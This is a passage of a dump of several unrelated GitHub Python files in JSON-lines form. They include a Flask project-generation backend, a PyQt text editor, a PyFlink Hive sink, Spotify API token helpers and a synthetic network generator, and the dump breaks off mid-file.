CODE\")\n print(request.json)\n logged = check_logged_session(request)\n if not logged:\n print(\"NOT LOGGED\")\n return {\"logged\": False}\n\n items_info = {}\n\n items = request.json['items']\n positions = request.json['positions']\n project_type = request.json['type']\n\n print(\"ITEMS\", items)\n print(\"POSITIONS\", positions)\n\n for itemKey in items:\n items_info[itemKey] = items[itemKey]\n items_info[itemKey][\"connectsTo\"] = positions[itemKey]['connectsTo']\n\n print(\"items info\", items_info)\n\n if project_type == \"EIP\":\n routes = \"\"\n dependencies = \"\"\n parsed = parse(items_info)\n # Parse\n if (parsed[0]):\n print(\"Parser OK\")\n # Generate Code\n routes, dependencies = create_routes(items_info)\n print(routes, dependencies)\n zip_project = create_project(\"com.opus\", \"projetoAutomatico\", routes, dependencies)\n add_user_generated_file(request, zip_project + \".zip\")\n return json.dumps({\"routes\": routes, \"fileName\": zip_project}), 200\n else:\n print({\"error\": parsed[1], \"fileName\": \"\"})\n return json.dumps({\"error\": parsed[1], \"fileName\": \"\"}), 200\n\n\n elif project_type == \"KALEI\":\n codes, _ = create_kalei(items_info)\n result, file_name = generate_and_eval_kalei(codes)\n add_user_generated_file(request, file_name + \".ll\")\n return json.dumps({\"code\": codes, \"result\": result, \"fileName\": file_name}), 200\n\n@app.route('/download_project', methods=['GET'])\ndef download_project():\n fileName = request.args.get('fileName')\n\n project_type = request.args.get('type')\n \n if project_type == \"EIP\":\n fileName += \".zip\"\n attach_filename = \"IntegrationProject.zip\"\n elif project_type == \"KALEI\":\n fileName += \".ll\"\n attach_filename = \"KaleidoscopeIR.ll\"\n\n return send_file(os.path.join(\"projetos_gerados\", fileName), attachment_filename=attach_filename, as_attachment=True), 200\n\n\n@app.route('/save_project', methods=['POST'])\ndef save_project():\n print(\"SAVE PROJECT\")\n\n print(request.json)\n logged = check_logged_session(request)\n if not logged:\n return {\"logged\": False}\n\n\n saveProject(request.json)\n\n return {}\n\n@app.route('/open_project', methods=['POST'])\ndef open_project():\n logged = check_logged_session(request)\n if not logged:\n return {\"logged\": False}\n\n client_email = request.json[\"client_email\"]\n project_name = request.json[\"project_name\"]\n print(client_email, project_name)\n\n projeto = loadProject(client_email, project_name)\n return projeto\n\n@app.route('/projects', methods=['GET'])\ndef projects():\n client_email = request.args.get('client_email')\n print(client_email)\n\n try:\n projects = getAllProjectsFromClient(client_email)\n names = []\n print(projects)\n print(names)\n\n for proj in projects:\n names.append(proj['project_name'])\n\n return json.dumps({\"project_names\": names}), 200\n\n except InvalidClientEmail as e:\n return json.dumps({\"error\": e.title, \"status\": e.status, \"message\": e.message}), e.status\n\n\n# Login Section\n\n@app.route('/login', methods=['POST'])\ndef login():\n email = request.json['client_email']\n password = request.json['pass']\n logged = clientLogin(email, password)\n \n session = json.loads(r.get('session'))\n\n if logged:\n session[email] = email\n r.set('session', json.dumps(session))\n print(\"LOGIN\")\n print(session)\n return json.dumps({\"logged\": True, \"email\": email}), 200\n else:\n return json.dumps({\"logged\": False}), 200\n\n@app.route('/signup', methods=['POST'])\ndef signup():\n email = request.json['client_email']\n password = request.json['pass']\n signedup = addClient(email, password)\n\n session = json.loads(r.get('session'))\n if signedup:\n session[email] = email\n r.set('session', json.dumps(session))\n return json.dumps({\"signedup\": True, \"email\": email}), 200\n else:\n return json.dumps({\"signedup\": False}), 200\n\n@app.route('/logout', methods=['POST'])\ndef logout():\n email = request.json['client_email']\n session = json.loads(r.get('session'))\n if email in session:\n remove_user_generated_files(request)\n session.pop(email, None)\n r.set('session', json.dumps(session))\n print(\"LOGOUT\")\n print(session)\n \n return json.dumps({\"logged\": False, \"email\": email}), 200\n\n\n@app.route('/islogged', methods=['POST'])\ndef islogged():\n print(\"IS_LOGGED?\")\n email = request.json['client_email']\n session = json.loads(r.get('session'))\n print(email)\n print(session)\n if email in session:\n return json.dumps({\"logged\": True, \"email\": email}), 200\n else:\n return json.dumps({\"logged\": False}), 200\n\nif __name__ == '__main__':\n app.run(debug=True, port=5000)\n","repo_name":"rodipm/TccOpus","sub_path":"back/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36292472226","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nimport sys\n\n# Metin Düzenleyici\n\nclass Window(QWidget):\n def __init__(self, title, shape, icon):\n super().__init__()\n self.title = title\n self.x, self.y, self.w, self.h = shape\n self.icon = QIcon(icon)\n self.file = \"\"\n self.vbox = QVBoxLayout()\n self.initUI()\n self.setLayout(self.vbox)\n self.show()\n\n def initUI(self):\n self.setWindowTitle(self.title)\n self.setWindowIcon(self.icon)\n self.setGeometry(self.x, self.y, self.w, self.h)\n self.setFont(QFont(\"Arial\", 11))\n\n hbox = QHBoxLayout()\n \n self.todo_text = QTextEdit()\n\n self.btns = QVBoxLayout()\n\n self.open_file = QPushButton(text=\"Open Folder\", clicked=self.OpenFile)\n self.open_file.setFixedWidth(200)\n self.btns.addWidget(self.open_file)\n\n self.save_file = QPushButton(text=\"Save\", clicked=self.SaveFile)\n self.save_file.setFixedWidth(200)\n self.btns.addWidget(self.save_file)\n self.btns.addStretch()\n\n hbox.addLayout(self.btns)\n hbox.addWidget(self.todo_text)\n\n self.vbox.addLayout(hbox)\n\n def OpenFile(self):\n dlg = QFileDialog()\n dlg.exec_()\n self.file = dlg.selectedFiles()[0]\n \n with open(self.file, \"r\") as f:\n data = f.read()\n self.todo_text.setText(data)\n\n def SaveFile(self):\n if self.file != \"\":\n with open(self.file, \"w\") as f:\n f.write(self.todo_text.toPlainText())\n QMessageBox.information(self, self.title, \"File saved!\")\n else:\n QMessageBox.information(self, self.title, \"File can't saved!\")\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = Window(\"Text Editor\", (100, 100, 1300, 800), \"../img/icon.jpg\")\n app.setStyle(\"Windows\")\n app.exec_()","repo_name":"alikemalcelik42/Text-Editor","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20107863869","text":"import sys\nfrom datetime import date, datetime\nfrom pyflink.table import EnvironmentSettings, TableEnvironment, SqlDialect\nfrom pyflink.table import types as FT\nfrom pyflink.table.catalog import HiveCatalog\n\ndef to_hive_type(data_type):\n if isinstance(data_type, (FT.CharType, FT.VarCharType)):\n return 'STRING'\n elif isinstance(data_type, FT.DecimalType):\n return f'DECIMAL({data_type.precision},{data_type.scale})'\n elif isinstance(data_type, (FT.TimestampType, FT.LocalZonedTimestampType)):\n return 'TIMESTAMP'\n elif isinstance(data_type, FT.ArrayType):\n return f'ARRAY<{to_hive_type(data_type.element_type)}>'\n elif isinstance(data_type, FT.MapType):\n return f'MAP<{to_hive_type(data_type.key_type)}, {to_hive_type(data_type.value_type)}>'\n elif isinstance(data_type, FT.RowType):\n fields = ',\\n'.join([f'`{f.name}`: {to_hive_type(f.data_type)}' for f in data_type])\n return f'STRUCT<\\n{fields}\\n>'\n elif isinstance(data_type, (FT.BooleanType, FT.TinyIntType, FT.SmallIntType, FT.IntType, FT.BigIntType, FT.FloatType, FT.DoubleType, FT.DateType)):\n return data_type.type_name()\n else:\n raise TypeError(f'Unsupported data type {type(data_type)} in hive')\n \ndef to_hive_schema(schema, partition_fields=[]):\n partition_fields = set(partition_fields)\n fields = [] # ordinary fields\n partitions = [] # partition fields\n for i in range(schema.get_field_count()):\n name = schema.get_field_name(i)\n line = f'`{name}` {to_hive_type(schema.get_field_data_type(i))}'\n if name in partition_fields:\n partitions.append(line)\n else:\n fields.append(line)\n return ',\\n'.join(fields), '\\n'.join(partitions)\n\nif __name__ == '__main__':\n b_set = EnvironmentSettings.in_batch_mode()\n bt_env = TableEnvironment.create(environment_settings=b_set)\n bt_conf = bt_env.get_config()\n \n bt_env.register_catalog('hive', HiveCatalog('hive', default_database=sys.argv[1], hive_conf_dir=sys.argv[2]))\n bt_env.use_catalog('hive')\n table = bt_env.from_elements(\n elements = [(\n 'Alice',\n 1,\n ['hello', 'world'],\n {'lat':30.0, 'lon':119.0},\n datetime.now(),\n date.today(),\n )],\n schema = FT.RowType([\n FT.RowField('name', FT.VarCharType(0x7fffffff)),\n FT.RowField('age', FT.IntType()),\n FT.RowField('tags', FT.ArrayType(FT.VarCharType(0x7fffffff))),\n FT.RowField('geo', FT.RowType([\n FT.RowField('lat', FT.DoubleType()),\n FT.RowField('lon', FT.DoubleType()),\n ])),\n FT.RowField('update_time', FT.TimestampType(3)),\n FT.RowField('partition_date', FT.DateType()),\n ])\n )\n\n fields, partitions = to_hive_schema(table.get_schema(), ['partition_date'])\n bt_conf.set_sql_dialect(SqlDialect.HIVE)\n sql = f'''\n CREATE TABLE IF NOT EXISTS {sys.argv[3]} (\n {fields}\n )\n PARTITIONED BY ({partitions})\n STORED AS ORC\n '''\n print(sql)\n bt_env.execute_sql(sql)\n table.insert_into(sys.argv[3])\n bt_env.execute('hive_sink')\n\n","repo_name":"mvpboss1004/pyflink_examples","sub_path":"hive_sink/hive_sink.py","file_name":"hive_sink.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31440895736","text":"#!/usr/bin/env python3\n\n# Standard modules\nimport logging\nlogging.basicConfig(level=logging.INFO)\nimport sys\nimport copy\n# External modules\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef main():\n '''\n Loads a npy feature tensor and plot it in a single image\n '''\n if len(sys.argv) != 2:\n logging.error(\"Usage : {} file.npy\".format(sys.argv[0]))\n sys.exit(1)\n\n # Load the data\n logging.info(\"Loading {}\".format(sys.argv[1]))\n with open(sys.argv[1], 'rb') as f:\n data = np.load(f).ravel()\n\n # We build a squared image\n size = data.size\n N = int(np.ceil(np.sqrt(data.size)))\n logging.info(\"Feature space size : {}\".format(size))\n\n # Fill in the first elements with our data\n img = np.zeros((N, N), dtype=float)\n img[:] = np.nan\n img.reshape(-1)[:size] = data[::]\n img = np.clip(img, 0, 1)\n\n cmap = copy.copy(matplotlib.cm.get_cmap())\n cmap.set_bad(color='white')\n\n plt.figure()\n plt.imshow(img)\n plt.gca().axis('off')\n filename = '{}.png'.format(sys.argv[1][:-4])\n plt.savefig(filename, bbox_inches='tight')\n logging.info(\"{} saved\".format(filename))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jeremyfix/pytorch_feature_extraction","sub_path":"plot_features.py","file_name":"plot_features.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10899364405","text":"from django.utils import timezone\nfrom .models import SpotifyToken\nfrom datetime import timedelta\nfrom requests import post, put, get\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .credentials import CLIENT_ID, CLIENT_SECRET\n\nBASE_URL = 'https://api/spotify.com/v1/me/'\n\ndef get_user_tokens(session_id):\n user_tokens = SpotifyToken.objects.filter(user=session_id)\n if user_tokens.exists():\n return user_tokens[0]\n else:\n return\n\n\ndef update_or_create_user_tokens(session_id, access_token, token_type, expires_in, refresh_token):\n\n #checking if the user already has a token\n tokens = get_user_tokens(session_id)\n\n expires_in = timezone.now() + timedelta(seconds=expires_in)\n\n #updating the user token\n if tokens:\n tokens.access_token = access_token\n tokens.token_type = token_type\n tokens.expires_in = expires_in\n tokens.save(update_fields=['access_token', 'token_type', 'expires_in'])\n\n #creating a new user token\n else:\n tokens = SpotifyToken(\n user=session_id,\n access_token=access_token,\n refresh_token=refresh_token,\n token_type=token_type,\n expires_in=expires_in\n )\n tokens.save()\n\n\ndef is_spotify_authenticated(session_id):\n tokens = get_user_tokens(session_id)\n\n #checking if authenticated\n if tokens:\n\n #checking if the token has expired or not\n expiry = tokens.expires_in\n\n #if token has expired, get a new token\n if expiry <= timezone.now():\n refresh_spotify_token(tokens, session_id)\n\n return True\n\n return False\n\n\ndef refresh_spotify_token(tokens, sessionId):\n refresh_token = tokens.refresh_token\n\n\n #getting new token\n response = post('https://accounts.spotify.com/api/token', data={\n 'grant_type': 'refresh_token',\n 'refresh_token' :refresh_token,\n 'client_id' : CLIENT_ID,\n 'client_secret' : CLIENT_SECRET\n }).json()\n\n access_token = response.get('access_token')\n token_type = response.get('token_type')\n expires_in = response.get('expires_in')\n\n\n update_or_create_user_tokens(sessionId, access_token, token_type, expires_in, refresh_token)\n\n\n#to handle api request to spotify\ndef execute_spotify_api_request(session_id, endpoint, post_=False, put_=False):\n\n tokens = get_user_tokens(session_id)\n if tokens == None:\n return Response(\n {'not Found': 'Login with spotify'},\n status=status.HTTP_404_NOT_FOUND)\n\n access_token = tokens.access_token\n headers={\n 'Content-Type':'application/json',\n 'Authorization':f'Bearer {access_token}'\n }\n\n if post_:\n res = post(endpoint, headers=headers)\n print(res.json())\n\n if put_:\n res = put(endpoint, headers=headers)\n print(res.json())\n\n res = get(endpoint, {}, headers=headers)\n\n try:\n return res.json()\n except:\n return {'error': 'Issue with request'}\n\n\ndef play_song(session_id):\n endpoint = 'https://api.spotify.com/v1/me/player/play'\n return execute_spotify_api_request(session_id, endpoint, put_=True)\n\n\ndef pause_song(session_id):\n endpoint = 'https://api.spotify.com/v1/me/player/pause'\n return execute_spotify_api_request(session_id, endpoint, put_=True)\n\n\ndef skip_song(session_id):\n endpoint = 'https://api.spotify.com/v1/me/player/next'\n return execute_spotify_api_request(session_id, endpoint, post_=True)","repo_name":"azhussainn/Music-App-Rumba","sub_path":"spotify/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18683167231","text":"from flask import Flask, render_template, session\nimport configs\nfrom exts import db\n\n\napp = Flask(__name__)\n# 导入配置文件\napp.config.from_object(configs)\n# 初始化\ndb.init_app(app)\n\n\n@app.route('/session/')\ndef ses():\n session['username'] = 'zhangsan'\n session.permanent = True\n return session.get('username')\n\n\n@app.route('/db/')\ndef data():\n \"\"\"数据库的增删改查\"\"\"\n # 增\n # article1 = Article(title='aaa', content='bbb') # 创建数据实例\n # db.session.add(article1) # 增加数据的事务操作\n # db.session.commit() # 提交事务\n\n # user1 = User(username='zhang')\n # # 方法一,添加文章,关联作者id\n # article1 = Article(title='aaa', content='bbb', author_id=1)\n # # 方法二,将文章关联到作者“zhang”上\n # article2 = Article(title='ccc', content='ddd')\n # article2.author = User.query.filter(User.username == 'zhang').first()\n # db.session.add(user1)\n # db.session.add(article1)\n # db.session.add(article2)\n # db.session.commit()\n # 增加文章并添加标签\n # article3 = Article(title='a', content='nihao', author_id=1)\n # article4 = Article(title='b', content='hello world', author_id=1)\n # tag1 = Tag(name='111')\n # tag2 = Tag(name='222')\n # article3.tags.append(tag1)\n # article3.tags.append(tag2)\n # article4.tags.append(tag1)\n # db.session.add(article3)\n # db.session.add(article4)\n # db.session.add(tag1)\n # db.session.add(tag2)\n # db.session.commit()\n\n # 查\n # articles = Article.query.filter(Article.title == 'aaa').all() # 返回的是Query对象列表(first()可取第一个)\n # for i in articles:\n # print({'title': i.title, 'content': i.content}) # i.title表示i对象的title属性值\n # # 查找文章标题aaa的作者姓名\n # article = Article.query.filter(Article.title == 'aaa').first()\n # print(article.author.username)\n # # 查找作者zhang写的所有文章\n # user = User.query.filter(User.username == 'zhang').first()\n # result = user.articles\n # for i in result:\n # print(i.title)\n # 查找文章标题为a下的所有标签\n # article = Article.query.filter(Article.title == 'a').first()\n # result = article.tags\n # for i in result:\n # print(i.name)\n\n # 改\n # # 1.找出要修改的数据\n # article1 = Article.query.filter(Article.title == 'aaa').first()\n # # 2.修改数据内容\n # article1.title = 'ccc'\n # article1.content = 'ddd'\n # # 3.提交事务\n # db.session.commit()\n\n # 删\n # # 1.找出要删除的数据\n # article2 = Article.query.filter(Article.title == 'ccc').first()\n # # 2.删除数据\n # db.session.delete(article2)\n # # 3.提交事务\n # db.session.commit()\n return 'hello world'\n\n\n@app.route('/<is_login>')\ndef index(is_login):\n class Person(object):\n name = '包拯'\n age = 45\n\n context = {\n 'username': u'知了课堂',\n 'sex': u'男',\n 'age': 18,\n 'Person': Person,\n 'websites': {\n 'baidu': 'www.baidu.com',\n 'sina': 'www.sina.com.cn'\n }\n }\n if is_login == '1':\n return render_template('index.html', context=context)\n else:\n return render_template('index.html')\n\n\n@app.route('/books/')\ndef for_book():\n books = [\n {\n 'name': '三国演义',\n 'price': 200\n },\n {\n 'name': '红楼梦',\n 'price': 200\n },\n {\n 'name': '水浒传',\n 'price': 200\n },\n {\n 'name': '西游记',\n 'price': 200\n }\n ]\n return render_template('books.html', books=books)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"jiyabing/learning","sub_path":"开班笔记/个人项目/flask_pro/flask_test/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16061434150","text":"import tkinter as tk\n\n\nclass Page3View(tk.Frame):\n \"\"\" Page 3 \"\"\"\n\n def __init__(self, parent, submit_callback):\n \"\"\" Initialize Page 1 \"\"\"\n tk.Frame.__init__(self, parent, width=800, height=800)\n self._parent = parent\n\n self._submit_callback = submit_callback\n\n self._data = [\"first_name\", \"last_name\", \"member_num\", \"annual_salary\", \"contract_years_length\", \"type\"]\n\n self._create_widgets()\n\n def _create_widgets(self):\n \"\"\" Creates the widgets for Page 3 \"\"\"\n\n self._entry_name = tk.Listbox(self)\n self._entry_name.grid(row=1,column=1)\n\n self._button = tk.Button(self,\n text=\"Refresh\",\n command=self._submit_callback)\n self._button.grid(row=2,column=1,padx=20)\n\n def set_form_data(self, all):\n self._entry_name.delete(0, tk.END)\n for item in all:\n self._entry_name.insert(tk.END, \"%d. %s %s (%s)\" % (item['id'], item['first_name'], item['last_name'],\n item['member_num']))\n\n\n\n\n\n","repo_name":"michaeljacinto/PlayerManager","sub_path":"View/page3_view.py","file_name":"page3_view.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"654079766","text":"import os\r\nfrom download_gdrive import *\r\n\r\nfile_id = '1rPcbnanuApZeo2uc7h55OneBkbcFCnnf'\r\nchpt_path = './datasets/'\r\nif not os.path.isdir(chpt_path):\r\n\tos.makedirs(chpt_path)\r\ndestination = os.path.join(chpt_path, 'datasets.zip')\r\ndownload_file_from_google_drive(file_id, destination) \r\nunzip_file(destination, chpt_path)","repo_name":"NVIDIA/vid2vid","sub_path":"scripts/download_datasets.py","file_name":"download_datasets.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":8394,"dataset":"github-code","pt":"37"} +{"seq_id":"8354672763","text":"\"\"\"\n Class for generation and management of synthetic single-layer networks according to the XOR model.\n It assumes a mixed effect of the community and hierarchical latent structures.\n\n Possible options: model with s permuted, model with s not permuted.\n\"\"\"\n\nimport math\nimport warnings\nimport numpy as np\nimport pandas as pd\nimport networkx as nx\nimport scipy.sparse as sparse\n\nfrom numba import jit\n\n\nclass SyntNetXOR(object):\n\n def __init__(self, m=1, N=100, K=3, l=1, prng=42, avg_degree=10., mu=0.5, structure='assortative', label='test',\n beta=1e4, gamma=0.5, delta0=0.01, eta=0.5, ag=0.6, bg=1., corr=0., over=0., means=(), stds=(),\n verbose=0, folder='../../data/input', L1=False, output_parameters=False, output_adj=False,\n outfile_adj='None', use_leagues=False, permute=True):\n self.N = N # network size (node number)\n self.m = m # number of networks to be generated\n self.prng = prng # seed random number generator\n self.label = label # label (associated uniquely with the set of inputs)\n self.folder = folder # input data folder path\n self.output_parameters = output_parameters # flag for storing the parameters\n self.output_adj = output_adj # flag for storing the generated adjacency matrix\n self.outfile_adj = outfile_adj # name for saving the adjacency matrix\n self.avg_degree = avg_degree # required average degree\n self.delta0 = delta0 # outgroup interaction probability\n self.permute = permute # flag for permuting s variables (not overlapping option)\n\n if verbose > 2 and not isinstance(verbose, int):\n raise ValueError('The verbosity parameter can only assume values in {0,1,2}!')\n self.verbose = verbose # verbosity flag\n\n if mu < 0 or mu > 1:\n raise ValueError('The Binomial parameter mu has to be in [0, 1]!')\n if mu == 1: mu = 1 - 1e-13\n if mu == 0: mu = 1e-13\n self.mu = mu # sigma latent variable a prior mean\n\n ''' Community-related inputs '''\n if structure not in ['assortative', 'disassortative', 'core-periphery', 'directed-biased']:\n raise ValueError('The available structures for the affinity matrix w '\n 'are: assortative, disassortative, core-periphery '\n 'and directed-biased!')\n self.structure = structure # the affinity matrix structure\n self.K = K # number of communities\n if eta <= 0 and L1:\n raise ValueError('The Dirichlet parameter eta has to be positive!')\n self.eta = eta # eta parameter of the Dirichlet distribution\n if ag <= 0 and not L1:\n raise ValueError('The Gamma parameter alpha has to be positive!')\n self.ag = ag # alpha parameter of the Gamma distribution\n if bg <= 0 and not L1:\n raise ValueError('The Gamma parameter beta has to be positive!')\n self.bg = bg # beta parameter of the Gamma distribution\n self.L1 = L1 # flag for soft u,v generation preference, True -> Dirichlet, False -> Gamma\n if (corr < 0) or (corr > 1):\n raise ValueError('The correlation parameter has to be in [0, 1]!')\n self.corr = corr # correlation between u and v synthetically generated\n if (over < 0) or (over > 1):\n raise ValueError('The overlapping parameter has to be in [0, 1]!')\n self.over = over # fraction of nodes with mixed membership\n\n ''' Ranking-related inputs '''\n self.use_leagues = use_leagues\n if not self.use_leagues:\n l = 1\n self.l = l # the number of Gaussian for s\n if len(means) == self.l:\n self.means = means # means for s\n else:\n self.means = None\n if len(stds) == self.l:\n self.stds = stds # standard deviations for s\n else:\n self.stds = None\n self.beta = beta # inverse temperature parameter\n if gamma <= 0:\n raise ValueError('The spring constant gamma has to be positive!')\n self.gamma = gamma # spring constant for (s, origin)\n\n def EitherOr_planted_network(self, parameters=None):\n \"\"\"\n Generate a directed, possibly weighted network by using the XOR model.\n Steps:\n 1. Generate or load the latent variables.\n 2. Extract A_ij entries (network edges) from a combination of Poisson\n distributions;\n\n Parameters\n ----------\n parameters : object\n Latent variables z, s, u, v and w.\n Returns\n ----------\n G : Digraph\n DiGraph NetworkX object. Self-loops allowed.\n \"\"\"\n\n # Set seed random number generator\n prng = np.random.RandomState(self.prng)\n\n ''' Latent variables '''\n if parameters is None:\n # Generate latent variables\n self.z, self.s, self.u, self.v, self.w, nodes_s = self._generate_lv(prng)\n else:\n # Set latent variables\n self.z, self.s, self.u, self.v, self.w, nodes_s = parameters\n\n k_sr, k_mt, c, eps = 0., 0., 0., 0.\n\n if (self.z == 0).all():\n warnings.warn('All Z entries are 0: Generation with MT model.')\n self.s = np.zeros(self.N)\n S = np.zeros((self.N, self.N))\n k_mt = self.avg_degree\n else:\n # Compute normalization term for c_sr\n deltas = delta_scores(self.s)\n expH = np.exp(-self.beta * 0.5 * np.power((deltas - 1), 2))\n # Compute c_sr\n eps = 2 * self.mu * (1-self.mu) * self.delta0 * self.N\n k_sr = self.mu * (self.avg_degree - eps) * (self.mu**2 + (1-self.mu)**2)\n c = self.N * k_sr / (self.mu * (self.mu**2 + (1-self.mu)**2) * expH.sum())\n S = c * expH\n\n if (self.z == 1).all():\n warnings.warn('All Z entries are 1: Generation with SR model.')\n self.u = np.zeros((self.N, self.K))\n self.v = np.zeros((self.N, self.K))\n self.w = np.zeros((self.K, self.K))\n M = np.zeros((self.N, self.N))\n else:\n # Compute normalization term for c_mt\n M = np.einsum('ik,jq->ijkq', self.u, self.v)\n M = np.einsum('ijkq,kq->ij', M, self.w)\n # Update w with c_mt\n k_mt = self.avg_degree - k_sr - eps\n c_mt = self.N * k_mt / ((1 - self.mu) * (self.mu**2 + (1-self.mu)**2) * M).sum()\n self.w *= c_mt\n M *= c_mt\n\n ''' Network generation '''\n edge_type = self.z.copy(); edge_type[edge_type == 0] = -1 # sigma_i\n edge_mask = np.outer(edge_type, edge_type) # 1: high prob, -1: low prob (sigma_i * sigma_j)\n model_id = np.vstack([self.z] * self.N) # 0: MT, 1: SR, to be used only for coherent couples (Z_ij)\n\n ingroup = prng.poisson(model_id * S + (1 - model_id) * M, (self.N, self.N))\n outgroup = prng.poisson(self.delta0 * np.ones((self.N, self.N)), (self.N, self.N))\n\n A = np.where(edge_mask == -1, outgroup, ingroup)\n G = nx.from_numpy_matrix(A, create_using = nx.DiGraph)\n Z = np.where(A > 0, model_id, 0.5)\n\n ''' Network post-processing '''\n totM = np.sum(A)\n nodes = list(G.nodes())\n A = nx.to_scipy_sparse_matrix(G, nodelist = nodes, weight = 'weight')\n\n # Keep largest connected component\n Gc = max(nx.weakly_connected_components(G), key = len)\n nodes_to_remove = set(G.nodes()).difference(Gc)\n G.remove_nodes_from(list(nodes_to_remove))\n\n nodes = list(G.nodes())\n self.z = self.z[nodes]\n self.s = self.s[nodes]\n self.u = self.u[nodes]\n self.v = self.v[nodes]\n self.N = len(nodes)\n S = np.take(S, nodes, 1)\n S = np.take(S, nodes, 0)\n M = np.take(M, nodes, 1)\n M = np.take(M, nodes, 0)\n model_id = np.take(model_id, nodes, 1)\n model_id = np.take(model_id, nodes, 0)\n edge_mask = np.take(edge_mask, nodes, 1)\n edge_mask = np.take(edge_mask, nodes, 0)\n\n\n if self.verbose > 0:\n avg_w_deg = np.round(totM / float(G.number_of_nodes()), 3)\n avg_deg = np.round(G.number_of_edges() / float(G.number_of_nodes()), 3)\n\n print(f'Number of links in the upper triangular matrix: {sparse.triu(A, k = 1).nnz}\\n'\n f'Number of links in the lower triangular matrix: {sparse.tril(A, k = -1).nnz}')\n print(f'Sum of weights in the upper triangular matrix: {np.round(sparse.triu(A, k = 1).sum(), 2)}\\n'\n f'Sum of weights in the lower triangular matrix: {np.round(sparse.tril(A, k = -1).sum(), 2)}')\n print(f'Removed {len(nodes_to_remove)} nodes, because not part of the largest connected component')\n print(f'Number of nodes: {G.number_of_nodes()} \\n'\n f'Number of edges: {G.number_of_edges()}')\n print(f'Average degree (E/N): {avg_deg}')\n print(f'Average weighted degree (M/N): {avg_w_deg}')\n\n # Sparsity coefficient (decimal)\n sparsity_coef = lambda x: sum(x.flatten() == 0) / x.flatten().shape[0]\n if self.verbose == 2:\n print(f'Ratio: {self.mu}')\n print(f'z sparsity (~ 1 - Ratio) (%): {sparsity_coef(self.z) * 100}')\n print(f'M sparsity (%): {sparsity_coef(M) * 100}')\n print(f'S sparsity (%): {sparsity_coef(S) * 100}')\n print(f'c: {c}')\n print(f'L1: {self.L1}')\n\n if self.output_parameters:\n self._output_results(nodes, nodes_s, k_sr, k_mt, c, edge_mask, model_id)\n\n if self.output_adj:\n self._output_adjacency(G, outfile = self.outfile_adj)\n\n return G\n\n def _generate_lv(self, prng=None):\n \"\"\"\n Generate z, s, u, v, w latent variables.\n Parameters\n ----------\n prng : random generator container\n Seed for the random number generator.\n Returns\n ----------\n z : Numpy array\n Matrix NxN of model indicators (binary).\n\n s : Numpy array\n N-dimensional array of real ranking scores for each node.\n\n u : Numpy array\n Matrix NxK of out-going membership vectors, positive element-wise.\n With unitary L1 norm computed row-wise.\n\n v : Numpy array\n Matrix NxK of in-coming membership vectors, positive element-wise.\n With unitary L1 norm computed row-wise.\n\n w : Numpy array\n Affinity matrix KxK. Possibly None if in pure SpringRank.\n Element (k,h) gives the density of edges going from the nodes\n of group k to nodes of group h.\n\n nodes_s : Numpy array\n Result of the random permutation applied to the node IDs (if required).\n Can be used for inverting the permutation and induce the block structure\n generated by the leagues on the adjacency matrix.\n \"\"\"\n if prng is None:\n # Set seed random number generator\n prng = np.random.RandomState(seed = 42)\n\n # Generate z through binomial distribution\n z = prng.binomial(1, self.mu, self.N)\n # Generate s through gaussians\n s, nodes_s = ranking_scores(prng, self.use_leagues, self.permute, self.gamma, self.beta, self.N, self.l,\n self.means, self.stds)\n # Generate u,v,w for possibly overlapping communities\n u, v = membership_vectors(prng, self.L1, self.eta, self.ag, self.bg, self.K, self.N, self.corr, self.over)\n w = affinity_matrix(self.structure, self.N, self.K, self.avg_degree)\n\n return z, s, u, v, w, nodes_s\n\n def _output_results(self, nodes, nodes_s, k_sr, k_mt, c, edge_mask, model_id):\n \"\"\"\n Output results in a compressed file.\n Parameters\n ----------\n nodes : list\n List of nodes IDs.\n nodes_s: Numpy array\n Result of the random permutation applied to the node IDs (if required)\n k_sr : float\n Fraction of average degree given by the hierarchical mechanism.\n k_mt : float\n Fraction of average degree given by the community mechanism.\n c : float\n Overall sparsity coefficient.\n edge_mask : Numpy array\n Mask that return the adjacency matrix entries representing in-group connections.\n model_id : Numpy array\n Node type vector.\n\n \"\"\"\n\n output_parameters = self.folder + 'results_' + self.label + '_' + str(self.prng)\n np.savez_compressed(output_parameters + '.npz', s = self.s, u = self.u, v = self.v,\n w = self.w, z = model_id, edge_mask = edge_mask, mu = self.mu, beta = self.beta,\n sigma = self.z, delta0 = self.delta0, k_sr = k_sr, k_mt = k_mt, c = c, nodes = nodes,\n nodes_s = nodes_s)\n if self.verbose:\n print()\n print(f'Parameters saved in: {output_parameters}.npz')\n print('To load: theta=np.load(filename), then e.g. theta[\"u\"]')\n\n def _output_adjacency(self, G, outfile=None):\n \"\"\"\n Output the adjacency matrix. Default format is space-separated .csv\n with 3 columns: node1 node2 weight\n\n Parameters\n ----------\n G: Digraph\n DiGraph NetworkX object.\n outfile: str\n Name of the adjacency matrix.\n \"\"\"\n\n if outfile is None:\n outfile = 'syn_' + self.label + '_' + str(self.prng) + '.dat'\n\n edges = list(G.edges(data = True))\n try:\n data = [[u, v, d['weight']] for u, v, d in edges]\n except:\n data = [[u, v, 1] for u, v, d in edges]\n\n df = 